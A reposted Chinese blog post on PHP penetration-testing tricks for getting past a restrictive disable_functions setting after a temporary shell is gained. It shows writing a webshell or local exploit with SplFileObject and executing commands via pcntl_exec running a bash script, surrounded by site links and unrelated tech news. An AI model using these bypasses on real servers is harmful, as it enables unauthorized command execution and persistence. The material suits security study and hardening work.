php渗透测试技巧-文件操作与利用pcntl_exec突破disable_functions - 代码天地

php渗透测试技巧-文件操作与利用pcntl_exec突破disable_functions

其他 2021-03-31 14:52:30 阅读次数: 0

有些时候通过文件包含漏洞或其他漏洞拿到一个临时shell之后却发现服务器对disable_functions做了比较变态的设置。使得我们没法将shell或local exp写到其他目录。

#print_r(ini_get('disable_functions'));
putenv,chdir,dl,shell_exec,exec,system,passthru,popen,fopen,
fputs,mkdir,rmdir,rename,move_uploaded_file,unlink,copy,chgrp,
chown,lchgrp,lchown,chmod,touch,symlink,link,apache_request_headers,
highlight_file,show_source,highlight_string,parse_ini_file,mail,tempnam,
tmpfile,file_put_contents,error_log,proc_open,stream_socket_server,phpinfo,phpversion

如上所示服务器禁止了写文件操作和命令执行等函数, 但利用php的一些特性均可以实现类似的功能。首先我想到可以使用的函数是gzopen, imagejpeg, session_save_path等, 对于写webshell来说基本够用了,但如果写一个local exp的话里面会参杂一些我不想要的数据, 好在PHP 5起多了一个SplFileObject的文件操作类，由于SplFileObject使用的人较少所以服务器的安全设置一般会漏掉。

<?php
    $file = new SplFileObject("/var/www/html/hispy/b4dboy.php", "w");
    $written = $file->fwrite('shellcode');
    echo "Wrote $written bytes to file";
    #print_r(glob('/var/www/html/hispy/*'));
?>

利用pcntl_exec突破disable_functions
说明：
pcntl是linux下的一个扩展，可以支持php的多线程操作。
pcntl_exec函数的作用是在当前进程空间执行指定程序，版本要求：PHP > 4.2.0
在做渗透的时候被disable_functions卡住不能执行命令是家常便饭，在执行phpinfo();的时候眼前闪过–enable-pcntl。当时我就偷笑了，没啥好说的，我一直强调渗透要细心做人做事也一样

#exec.php
<?php pcntl_exec(“/bin/bash”, array(“/tmp/b4dboy.sh”));?>

#/tmp/b4dboy.sh
#!/bin/bash
ls -l /

猜你喜欢

转载自blog.csdn.net/weixin_45682070/article/details/107897461

php渗透测试技巧-文件操作与利用pcntl_exec突破disable_functions

无需sendmail：巧用LD_PRELOAD突破disable_functions

利用ld_preload方式绕过disable_functions

PHP 7.1-7.3 disable_functions bypass

FFI绕过disable_functions

[转+自]disable_functions之巧用LD_PRELOAD突破

php禁用eval,php无法禁用eval,disable_functions无效

有些需要禁用的PHP危险函数(disable_functions)

绕过disable_functions执行命令实验

通过LD_PRELOAD绕过disable_functions

PHP 7.0 7.3 (Unix) - 'gc' Disable Functions Bypass

PHP pcntl

渗透测试技巧之Redis漏洞利用总结

【渗透测试-web安全】文件操作漏洞

渗透技巧——Token窃取与利用

【渗透测试】—如何利用文件包含的方式进行攻击

PHP中通过bypass disable functions执行系统命令的几种方式

pcntl php多进程

php安装pcntl扩展

渗透测试nmap命令技巧

双文件上传突破利用

WordPress Functions.php文件详解

PHP利用技巧

【渗透测试实战】PHP语言有哪些后门？以及利用方法

渗透技巧——利用netsh抓取连接文件服务器的NTLMv2 Hash

PHP中利用pcntl实现多进程(模拟多线程)实例(转)

php使用多进程（pcntl）

基于pcntl的PHP进程池

PHP 7.2.30 安装 pcntl 扩展

渗透测试的WINDOWS NTFS技巧集合

今日推荐

基于大语言模型的开源知识库问答系统 MaxKB GitHub Star 数量突破 5,000 个！

美国拟限制 AI 大模型出口中国和俄罗斯

苹果将与 OpenAI 达成协议，将 ChatGPT 应用于 iPhone

openKylin 社区生态委员会第六次会议圆满召开

阿里云正式发布通义千问 2.5

Python 3.13 发布首个 Beta：实验性自由线程模式和 JIT、改进交互式解释器

Stack Overflow 拿我的代码去训练 AI 大模型，还封了我的账号

Pop!_OS 的 COSMIC 桌面完成 App Store 上架工作

《2024 年一季度互联网投融资运行情况》研究报告

报告：Django 仍然是 74% 开发者的首选

15 年前上了“FFmpeg 耻辱柱”，今天他还得谢谢咱——腾讯QQPlayer一雪前耻？

TIOBE 5 月榜单：Fortran “复活”进入 Top 10

周排行

记一下去大梅沙的准备（2018-05-26）

Spring 注解事务

基于HTTP协议的客户端缓存

阿里云rds 备份和还原

[PHP] 几个拖慢 PHP 程序/API 运行速度的点

python 代码风格------------PEP8规则

js控制json生成菜单——自制菜单（一）

将字符串: 'k:1|k1:2|k2:3|k3:4 ' ,处理成 python 字典: {'k':1, 'k1':2, ...}

微信小程序转支付宝小程序

Qt551.窗口滚动条

每日归档

更多

2024-05-13(18)

2024-05-12(0)

2024-05-11(38)

2024-05-10(38)

2024-05-09(35)

2024-05-08(42)

2024-05-07(14)

2024-05-06(40)

2024-05-05(0)

2024-05-04(7)